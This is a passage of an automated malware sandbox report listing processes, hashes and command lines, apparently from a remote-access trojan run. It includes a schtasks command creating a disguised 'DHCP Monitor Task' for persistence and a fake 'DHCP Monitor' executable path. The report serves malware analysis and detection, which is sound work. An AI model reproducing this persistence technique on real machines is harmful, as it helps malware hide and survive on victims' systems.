                              Path:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Local\Temp\RegAsm.exe 0
                              Imagebase:0x990000
                              File size:64616 bytes
                              MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Reputation:high

                              Analysis Process: schtasks.exe PID: 6352 Parent PID: 6732

                              General

                              Start time:08:27:49
                              Start date:03/08/2021
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7DD3.tmp'
                              Imagebase:0xdd0000
                              File size:185856 bytes
                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Analysis Process: conhost.exe PID: 1088 Parent PID: 1476

                              General

                              Start time:08:27:49
                              Start date:03/08/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Analysis Process: conhost.exe PID: 2340 Parent PID: 6352

                              General

                              Start time:08:27:49
                              Start date:03/08/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Analysis Process: dhcpmon.exe PID: 5556 Parent PID: 968

                              General

                              Start time:08:27:51
                              Start date:03/08/2021
                              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
                              Imagebase:0xe60000
                              File size:64616 bytes
                              MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Antivirus matches:
                              • Detection: 0%, Virustotal, Browse
                              • Detection: 0%, Metadefender, Browse
                              • Detection: 0%, ReversingLabs

                              Analysis Process: conhost.exe PID: 5584 Parent PID: 5556

                              General

                              Start time:08:27:52
                              Start date:03/08/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Analysis Process: dhcpmon.exe PID: 6448 Parent PID: 3424

                              General

                              Start time:08:27:59
                              Start date:03/08/2021
                              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                              Imagebase:0xdf0000
                              File size:64616 bytes
                              MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              Analysis Process: conhost.exe PID: 7008 Parent PID: 6448

                              General

                              Start time:08:28:00
                              Start date:03/08/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Disassembly

                              Code Analysis

                              Reset < >